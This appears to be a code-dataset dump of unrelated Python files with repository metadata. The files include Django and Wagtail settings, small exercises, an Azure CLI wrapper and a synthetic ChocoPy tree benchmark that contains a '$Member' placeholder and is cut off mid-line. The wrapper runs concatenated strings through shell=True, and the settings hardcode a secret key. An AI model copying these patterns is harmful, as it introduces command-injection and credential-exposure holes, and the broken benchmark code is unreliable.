25df6a10b202d97a7c1598c18ec17325dee5ec84
[]
no_license
duk1edev/itproger
58bdd16088dec7864585d318935b118ce584874d
786f94fff6d816f3f978bd8c24c3d985ffd5ffb2
refs/heads/master
2021-01-02T02:43:32.684100
2020-03-28T18:10:25
2020-03-28T18:10:25
239,443,309
0
1
null
null
null
null
UTF-8
Python
false
false
571
py
from django import forms from .models import Course class CreateCourseForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(CreateCourseForm, self).__init__(*args, **kwargs) self.fields['slug'].label = 'Название URL' self.fields['title'].label = 'Название курса' self.fields['description'].label = 'Описание курса' self.fields['img'].label = 'Изображение профиля' class Meta: model = Course fields = ['slug', 'title', 'description', 'img']
70d103be4cf7033045a7bfe4abce7325e7410269
e0980f704a573894350e285f66f4cf390837238e
/.history/rocketman/settings/dev_20210104181322.py
6b33f05fcfb179db48a0b11ba3e3a32f5bde8bef
[]
no_license
rucpata/WagtailWebsite
28008474ec779d12ef43bceb61827168274a8b61
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
refs/heads/main
2023-02-09T15:30:02.133415
2021-01-05T14:55:45
2021-01-05T14:55:45
303,961,094
0
0
null
null
null
null
UTF-8
Python
false
false
638
py
from .base import * # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '0qjdxh8nibnbihjuj9*-%$#kx!i8y^wk6wt(h)@27m1g-9g$)v' # SECURITY WARNING: define the correct hosts in production! ALLOWED_HOSTS = ['localhost', 'rocketman.naukawagtail.com'] EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' INSTALLED_APPS += [ 'debug_toolbar', ] MIDDLEWARE += [ 'debug_toolbar.middleware.DebugToolbarMiddleware', ] INTERNAL_IPS = [ '127.0.0.1', ] try: from .local import * except ImportError: pass
0cb8fe31319034d1b0d7e1d5d9511de51d466943
781e2692049e87a4256320c76e82a19be257a05d
/all_data/exercism_data/python/anagram/1d85ad5d39ab4551a2af68f5a6bd2b21.py
1bbc9ad83b17ae2c9371525d8394a6a6641fbf73
[]
no_license
itsolutionscorp/AutoStyle-Clustering
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
refs/heads/master
2020-12-11T07:27:19.291038
2016-03-16T03:18:00
2016-03-16T03:18:42
59,454,921
4
0
null
2016-05-23T05:40:56
2016-05-23T05:40:56
null
UTF-8
Python
false
false
529
py
def detect_anagrams(word, anagrams): real_anagrams = [] for candidate in anagrams: # Case insensitive lower_word = word.lower() lower_candidate = candidate.lower() for char in lower_word: if char in lower_candidate: lower_candidate = lower_candidate.replace(char, "", 1) if not lower_candidate and len(candidate) == len(word): if candidate.lower() != lower_word: real_anagrams.append(candidate) return real_anagrams
f22577938fc54158f83a3dc1f43cd18d5cfa7cea
4a7ede06edbe66f9d1eb485261f94cc3251a914b
/test/pyaz/webapp/config/ssl/__init__.py
b8b893c526afb4dff9fd44ab4dc16187a35ffb19
[ "MIT" ]
permissive
bigdatamoore/py-az-cli
a9e924ec58f3a3067b655f242ca1b675b77fa1d5
54383a4ee7cc77556f6183e74e992eec95b28e01
refs/heads/main
2023-08-14T08:21:51.004926
2021-09-19T12:17:31
2021-09-19T12:17:31
360,809,341
0
0
null
null
null
null
UTF-8
Python
false
false
4,010
py
import json, subprocess from .... pyaz_utils import get_cli_name, get_params def upload(resource_group, name, certificate_password, certificate_file, slot=None): params = get_params(locals()) command = "az webapp config ssl upload " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def list(resource_group): params = get_params(locals()) command = "az webapp config ssl list " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def show(resource_group, certificate_name): params = get_params(locals()) command = "az webapp config ssl show " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def bind(resource_group, name, certificate_thumbprint, ssl_type, slot=None): params = get_params(locals()) command = "az webapp config ssl bind " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def unbind(resource_group, name, certificate_thumbprint, slot=None): params = get_params(locals()) command = "az webapp config ssl unbind " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def delete(resource_group, certificate_thumbprint): params = get_params(locals()) command = "az webapp config ssl delete " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def import_(resource_group, name, key_vault, key_vault_certificate_name): params = get_params(locals()) command = "az webapp config ssl import " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def create(resource_group, name, hostname, slot=None): params = get_params(locals()) command = "az webapp config ssl create " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr)
[ "“[email protected]”" ]
cb4b97b896fc5683599a57fe012bcc1fe716bb96
b49e7e1fb8557f21280b452b2d5e29668613fe83
/leonardo/module/web/widget/feedreader/models.py
e2b9999d1a451c50e6f88b523b571787e8d75ef2
[ "BSD-2-Clause" ]
permissive
pombredanne/django-leonardo
6e03f7f53391c024cfbfd9d4c91bd696adcb361d
dcbe6c4a0c296a03c3a98b3d5ae74f13037ff81b
refs/heads/master
2021-01-17T10:24:09.879844
2016-04-06T19:30:05
2016-04-06T19:30:05
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,619
py
# -#- coding: utf-8 -#- import datetime import feedparser from django.db import models from django.template.context import RequestContext from django.template.loader import render_to_string from django.utils.translation import ugettext_lazy as _ from leonardo.module.web.models import Widget, ContentProxyWidgetMixin from leonardo.module.web.widgets.mixins import ListWidgetMixin TARGET_CHOICES = ( ('modal', _('Modal window')), ('blank', _('Blank window')), ) class FeedReaderWidget(Widget, ContentProxyWidgetMixin, ListWidgetMixin): max_items = models.IntegerField(_('max. items'), default=5) class Meta: abstract = True verbose_name = _("feed reader") verbose_name_plural = _('feed readers') def render_content(self, options): if self.is_obsolete: self.update_cache_data() context = RequestContext(options.get('request'), { 'widget': self, }) return render_to_string(self.get_template_name(), context) def update_cache_data(self, save=True): feed = feedparser.parse(self.link) entries = feed['entries'][:self.max_items] context = { 'widget': self, 'link': feed['feed']['link'], 'entries': entries, } self.cache_data = render_to_string( 'widget/feedreader/_content.html', context) self.cache_update = datetime.datetime.now() if save: self.save() def save(self, *args, **kwargs): self.update_cache_data(False) super(FeedReaderWidget, self).save(*args, **kwargs)
8107640d66d0dd58eb2d0351d0559824dc3a2c98
c29763f930c7c00b435a9b25dddf7f6e2e8548a1
/Atividades disciplinas/6 periodo/IA/algoritmo de dijkstra/test.py
6417af691864735fbf0325a743f03bdf7e10a868
[]
no_license
jadsonlucio/Faculdade
f94ae6e513bb783f01c72dcb52479ad4bb50dc03
2ca553e8fa027820782edc56fc4eafac7eae5773
refs/heads/master
2020-07-06T20:34:10.087739
2019-12-07T20:45:55
2019-12-07T20:45:55
203,131,862
0
0
null
null
null
null
UTF-8
Python
false
false
1,172
py
import numpy as np from map.location import Location, calc_distance from map.map import Map COORDINATES_MAP_TEST_1 = { "latitude_min" : 0, "latitude_max" : 10, "longitude_min" : 0, "longitude_max" : 10 } CIDADES_ALAGOAS = list(open("tests/cidades_alagoas.txt", "r").readlines())[:10] def generate_random_sample(locations_names, latitude_min, latitude_max, longitude_min, longitude_max): locations = [] for location_name in locations_names: latitude = np.random.uniform(latitude_min + 1, latitude_max - 1) longitude = np.random.uniform(longitude_min + 1, longitude_max - 1) locations.append(Location(location_name, latitude,longitude)) for i in range(len(locations)): for j in range(i + 1, len(locations), 1): if np.random.random() > 0.7: cost = calc_distance(*locations[i].real_pos, *locations[j].real_pos) locations[i].add_conection(locations[j], cost) return locations def get_map_test_1(): locations = generate_random_sample(CIDADES_ALAGOAS, **COORDINATES_MAP_TEST_1) return Map(locations, **COORDINATES_MAP_TEST_1)
251411a9333fbd7da3a0557d59516ffd7672af6c
f6d8f211bd87b47b511ac0b6599806ab3131999f
/04-case-study-interface-design/ex_4_12_5.py
937b06979b4f78846f3bdcb3f460fea8fed15b30
[]
no_license
csu-xiao-an/think-python
6cea58da4644cd1351112560e75de150d3731ce9
8177b0506707c903c3d4d9a125c931aba890cc0c
refs/heads/master
2020-07-26T19:35:38.919702
2019-09-16T03:33:15
2019-09-16T03:33:15
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,746
py
"""This module contains a code for ex.5 related to ch.4.12. Think Python, 2nd Edition by Allen Downey http://thinkpython2.com """ import math import turtle def polyline(t, n, length, angle): """Draws n line segments. :param t: Turtle object :param n: number of line segments :param length: length of each segments :param angle: degrees between segments """ for i in range(n): t.fd(length) t.lt(angle) def arc(t, r, angle): """Draws an arc with the given radius and angle :param t: Turtle object :param r: radius of the arc :param angle: angle subtended by the arc, in degrees """ arc_length = 2 * math.pi * r * abs(angle) / 360 n = int(arc_length / 4) + 3 step_length = arc_length / n step_angle = float(angle) / n polyline(t, n, step_length, step_angle) def arch_spiral(t, n, length=4): """Draws an Archimedian spiral. :param t: Turtle object :param n: number of line segments :param length: length of each segment https://en.wikipedia.org/wiki/Archimedean_spiral """ a = 0.01 # how loose the initial spiral starts out (larger is looser) b = 0.0002 # how loosly coiled the spiral is (larger is looser) theta = 0.0 for i in range(n): t.fd(length) dtheta = 1 / (a + b * theta) t.lt(dtheta) theta += dtheta def fib_spiral(t, n): """Draws a Fibonacсi spiral. :param t: Turtle object :param n: length of sequence """ a, b = 0, 1 for i in range(n): arc(t, a, 90) a, b = b, a+b if __name__ == '__main__': bob = turtle.Turtle() # arch_spiral(bob, 200) fib_spiral(bob, 15) bob.hideturtle() turtle.mainloop()
49dbafb4ad1aeaf9119acdede9c7aa71c786d66a
727f1bc2205c88577b419cf0036c029b8c6f7766
/out-bin/py/google/fhir/models/model_test.runfiles/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/layers/utils.py
19fe50abb25751952deed4e3e7c7ae32c95d8ff6
[ "Apache-2.0" ]
permissive
rasalt/fhir
55cf78feed3596a3101b86f9e9bbf6652c6ed4ad
d49883cc4d4986e11ca66058d5a327691e6e048a
refs/heads/master
2020-04-13T00:16:54.050913
2019-01-15T14:22:15
2019-01-15T14:22:15
160,260,223
0
0
Apache-2.0
2018-12-03T22:07:01
2018-12-03T22:07:01
null
UTF-8
Python
false
false
174
py
/home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/layers/utils.py
74b5b828f3763b47c0928d9ef000736bbb8defdc
5c71d64db74c4c39b6e9adb70036a56e197f111c
/amsterdam-airbnb/CV_LinearRegression_selectedfeatures.py
7bf77d7e9d82ecfe3d6a251211a286ad6095989d
[]
no_license
sebkeil/Group20-VU
3e70f1e464bb9873c8e8125ae190a52f08c85804
38f80d80944583e1ac48c6219130de69c0c60242
refs/heads/master
2021-05-18T03:15:15.671035
2020-09-06T15:00:10
2020-09-06T15:00:10
251,079,102
0
0
null
null
null
null
UTF-8
Python
false
false
1,035
py
from sklearn.model_selection import cross_validate from sklearn.linear_model import LinearRegression import pandas as pd import numpy as np from sklearn.preprocessing import StandardScaler # read in files X_train = pd.read_csv('train.csv') y_train = pd.read_csv('y_train.csv', names=['price']) # drop features X_train = X_train.drop(['bathrooms', 'bedrooms','guests_included','host_listings_count','instant_bookable_f','room_type_Private room'],axis=1) # standardize data scaler = StandardScaler() X_train = scaler.fit_transform(X_train) # Create a linear regression object: reg reg = LinearRegression() # Compute 5-fold cross-validation scores: cv_scores cv_scores = cross_validate(reg, X_train, y_train, cv=5, scoring=('r2', 'neg_root_mean_squared_error')) # Print the 5-fold cross-validation scores #print(cv_scores) print("Average 5-Fold CV Score (R2): {}".format(round(np.mean(cv_scores['test_r2']),4))) print("Average 5-Fold CV Score (RMSE): {}".format(round(np.mean(cv_scores['test_neg_root_mean_squared_error']),2)))
8dca1271759ee7e83227a510a85cae83c7c18567
1c390cd4fd3605046914767485b49a929198b470
/PE/73.py
605024f5c153e5bca66a554ce755b76a2d0b1973
[]
no_license
wwwwodddd/Zukunft
f87fe736b53506f69ab18db674311dd60de04a43
03ffffee9a76e99f6e00bba6dbae91abc6994a34
refs/heads/master
2023-01-24T06:14:35.691292
2023-01-21T15:42:32
2023-01-21T15:42:32
163,685,977
7
8
null
null
null
null
UTF-8
Python
false
false
148
py
from fractions import gcd z=0 for i in range(12001): print i for j in range(i): if gcd(i,j)==1 and 2*j<=i and 3*j>=i: z+=1 print z-2
844fd7640e35207a398b570c7d71e27fb7b2de5f
70734c75951d1349a4a4f66ba82a24f4726aa968
/smartrecruiters_python_client/models/source_types.py
6e69f1629ccd49872df29317f8a45592265c7bfa
[ "MIT" ]
permissive
yogasukmawijaya/smartrecruiters-python-client
0f044847ef76bbe57a3a922e7b0adb4f98c0917f
6d0849d173a3d6718b5f0769098f4c76857f637d
refs/heads/master
2020-04-09T16:45:41.703240
2017-07-08T19:59:25
2017-07-08T19:59:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,002
py
# coding: utf-8 """ Unofficial python library for the SmartRecruiters API The SmartRecruiters API provides a platform to integrate services or applications, build apps and create fully customizable career sites. It exposes SmartRecruiters functionality and allows to connect and build software enhancing it. OpenAPI spec version: 1 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class SourceTypes(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self, total_found=None, content=None): """ SourceTypes - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. """ self.swagger_types = { 'total_found': 'int', 'content': 'list[SourceTypesContent]' } self.attribute_map = { 'total_found': 'totalFound', 'content': 'content' } self._total_found = total_found self._content = content @property def total_found(self): """ Gets the total_found of this SourceTypes. :return: The total_found of this SourceTypes. :rtype: int """ return self._total_found @total_found.setter def total_found(self, total_found): """ Sets the total_found of this SourceTypes. :param total_found: The total_found of this SourceTypes. :type: int """ if total_found is None: raise ValueError("Invalid value for `total_found`, must not be `None`") self._total_found = total_found @property def content(self): """ Gets the content of this SourceTypes. :return: The content of this SourceTypes. :rtype: list[SourceTypesContent] """ return self._content @content.setter def content(self, content): """ Sets the content of this SourceTypes. :param content: The content of this SourceTypes. :type: list[SourceTypesContent] """ if content is None: raise ValueError("Invalid value for `content`, must not be `None`") self._content = content def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, SourceTypes): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
9b0e6e18151779ef2c05e047ba28042259e4bdb8
4ab83ae9b3320e423116579a2de14600aeda16e0
/46_孩子们的游戏(圆圈中最后剩下的数).py
15ab243f7034126827dcc0951c5356c320a720dc
[]
no_license
yaodalu/JZOffer
a4e8d6611cbff686dbbdd95226caeb5614945f9c
ede5f500f45b865058352b0c37629d7f2254a4d6
refs/heads/master
2020-05-21T17:10:09.705926
2019-09-10T01:05:55
2019-09-10T01:05:55
186,118,657
1
1
null
null
null
null
UTF-8
Python
false
false
2,083
py
# -*- coding:utf-8 -*- class Solution: def LastRemaining_Solution(self, n, m): """单向循环链表解法""" if n == 0: #特殊情况,没有小朋友 return -1 if n == 1: #特殊情况,只有一个小朋友 return 1 if m == 1: #特殊情况,每次第一个小朋友退出 return n-1 myList = MyList(n) while not myList.judgeOneElem(): myList.pop(m) return myList.judgeOneElem().val class Node(): def __init__(self,val): self.val = val self.next = None class MyList(): """尾指针指向头节点的单向循环链表""" def __init__(self,n): #n>=2 self.__head = Node(0) cur = self.__head for i in range(1,n-1): #退出循环时,cur指向倒数第二个节点 cur.next = Node(i) cur = cur.next cur.next = Node(n-1) cur = cur.next cur.next = self.__head def judgeOneElem(self): """判断链表是否只有一个节点""" if self.__head and self.__head.next == self.__head: return self.__head #如果链表只有一个节点,则返回该节点 return False def pop(self,m): """遍历""" if self.__head is None: return cur,count = self.__head,0 while count != m-2 : #退出循环的时候,指针指向需要删除的节点的前一个节点 cur = cur.next count += 1 self.__head = cur.next.next #头节点指向删除节点的后一个节点 cur.next = self.__head if __name__ == "__main__": print Solution().LastRemaining_Solution(5,3)
0023937f5c12f7a15fd54083090d66e26fe0887a
f2cacb05d20e2e699e64035b6bee9a8bed3d3b8e
/atm/__init__.py
4d85ea4f53cca492fe01cc6e8f66cf043c77030a
[ "BSD-3-Clause" ]
permissive
moeyensj/atm
31e54e93c0881307770ab0d7815b9c4678f9f2e6
0523600cf44423a1ef72ca40fff29bbfbe1281a8
refs/heads/master
2022-08-13T05:33:54.131701
2021-03-03T23:38:02
2021-03-03T23:38:02
196,091,171
9
2
BSD-3-Clause
2021-03-03T23:38:03
2019-07-09T22:16:20
Python
UTF-8
Python
false
false
289
py
from .version import __version__ from .config import * from .constants import * from .frames import * from .helpers import * from .functions import * from .models import * from .obs import * from .analysis import * from .data_processing import * from .fit import * from .plotting import *
15a860f8bc4c092e866e5ee2784958d676c664fb
a98bc8906c3fbe4d388442d24cbeed06d06686f9
/Codechef 2019/sept Long 2019/chefinsq.py
a3cdcb3f34a5e9ed032f62cfec6c69d944f9028e
[]
no_license
Arrowheadahp/Contests-Challenges-and-Events
1ac4f1b2067276fa669e86ecfdb685d95ba663fd
fc156e5ae49b3074a9dbd56acd4fdc2af25c6a3f
refs/heads/master
2022-12-13T19:50:38.041410
2020-08-22T14:16:23
2020-08-22T14:16:23
197,886,111
0
0
null
null
null
null
UTF-8
Python
false
false
342
py
def fact(k): f = 1 while k: f*=k k-=1 return f for _ in range(input()): n, k = map(int, raw_input().split()) A = map(int, raw_input().split()) A.sort() x = A[k-1] s = A[:k].count(x) t = A.count(x) #print s, t print fact(t)/(fact(s)*fact(t-s)) ''' 2 4 2 1 2 3 4 4 2 1 2 2 2 '''
70a701bc5cf1cd1ac9d4ac6d0363562e3c83398d
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
/cases/synthetic/tree-big-2951.py
fa63609bcdcdfb979fea5d777ccafaefcce4369d
[]
no_license
Virtlink/ccbench-chocopy
c3f7f6af6349aff6503196f727ef89f210a1eac8
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
refs/heads/main
2023-04-07T15:07:12.464038
2022-02-03T15:42:39
2022-02-03T15:42:39
451,969,776
0
0
null
null
null
null
UTF-8
Python
false
false
23,286
py
# Binary-search trees class TreeNode(object): value:int = 0 left:"TreeNode" = None right:"TreeNode" = None def insert(self:"TreeNode", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode(x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode(x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode2(object): value:int = 0 value2:int = 0 left:"TreeNode2" = None left2:"TreeNode2" = None right:"TreeNode2" = None right2:"TreeNode2" = None def insert(self:"TreeNode2", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode2(x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode2(x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode2", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode2(x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode2(x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode2", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode2", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode3(object): value:int = 0 value2:int = 0 value3:int = 0 left:"TreeNode3" = None left2:"TreeNode3" = None left3:"TreeNode3" = None right:"TreeNode3" = None right2:"TreeNode3" = None right3:"TreeNode3" = None def insert(self:"TreeNode3", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode3", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode3", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode3", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode4(object): value:int = 0 value2:int = 0 value3:int = 0 value4:int = 0 left:"TreeNode4" = None left2:"TreeNode4" = None left3:"TreeNode4" = None left4:"TreeNode4" = None right:"TreeNode4" = None right2:"TreeNode4" = None right3:"TreeNode4" = None right4:"TreeNode4" = None def insert(self:"TreeNode4", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode4", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode4", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode4", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool: if x < $Member: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode5(object): value:int = 0 value2:int = 0 value3:int = 0 value4:int = 0 value5:int = 0 left:"TreeNode5" = None left2:"TreeNode5" = None left3:"TreeNode5" = None left4:"TreeNode5" = None left5:"TreeNode5" = None right:"TreeNode5" = None right2:"TreeNode5" = None right3:"TreeNode5" = None right4:"TreeNode5" = None right5:"TreeNode5" = None def insert(self:"TreeNode5", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode5", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode5", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode5", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class Tree(object): root:TreeNode = None size:int = 0 def insert(self:"Tree", x:int) -> object: if self.root is None: self.root = makeNode(x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree2(object): root:TreeNode2 = None root2:TreeNode2 = None size:int = 0 size2:int = 0 def insert(self:"Tree2", x:int) -> object: if self.root is None: self.root = makeNode2(x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree2", x:int, x2:int) -> object: if self.root is None: self.root = makeNode2(x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree2", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree2", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree3(object): root:TreeNode3 = None root2:TreeNode3 = None root3:TreeNode3 = None size:int = 0 size2:int = 0 size3:int = 0 def insert(self:"Tree3", x:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree3", x:int, x2:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree3", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree3", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree4(object): root:TreeNode4 = None root2:TreeNode4 = None root3:TreeNode4 = None root4:TreeNode4 = None size:int = 0 size2:int = 0 size3:int = 0 size4:int = 0 def insert(self:"Tree4", x:int) -> object: if self.root is None: self.root = 